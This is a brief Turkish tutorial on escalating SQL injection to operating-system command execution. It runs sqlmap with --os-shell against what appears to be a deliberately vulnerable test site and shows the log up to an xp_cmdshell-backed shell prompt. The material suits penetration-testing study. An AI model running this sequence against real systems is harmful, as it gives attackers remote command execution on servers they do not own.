Sqlmap Kullanarak İşletim Sistemi Ele Geçirme

Amaç:Sql injection açıklığını işletim sistemi bazında hedefi ele geçirmek amaçlı kullanma.

Kullanılan araçlar:

• Sqmap

1.Adım:--os-shell parametresi kullanarak sqlmap ile işletim sistemini ele geçirme.

root@kali:~# sqlmap phyton sqlmap.py -u 'http://testasp.vulnweb.com/showforum.asp?id=0' --os-shell
   ...
   ...
[20:52:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[20:52:18] [INFO] testing if current user is DBA
[20:52:18] [WARNING] functionality requested probably does not work because the curent session user is not a database administrator. You can try to use option '--dbms-cred' to execute statements as a DBA user if you were able to extract and crack a DBA password by any mean
[20:52:18] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[20:52:36] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[20:52:37] [INFO] testing if xp_cmdshell extended procedure is usable
[20:52:38] [INFO] heuristics detected web page charset 'ascii'
[20:52:38] [WARNING] the SQL query provided does not return any output
[20:52:38] [WARNING] the SQL query provided does not return any output
[20:52:38] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:52:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:52:42] [INFO] xp_cmdshell extended procedure is usable
[20:52:42] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[20:52:42] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>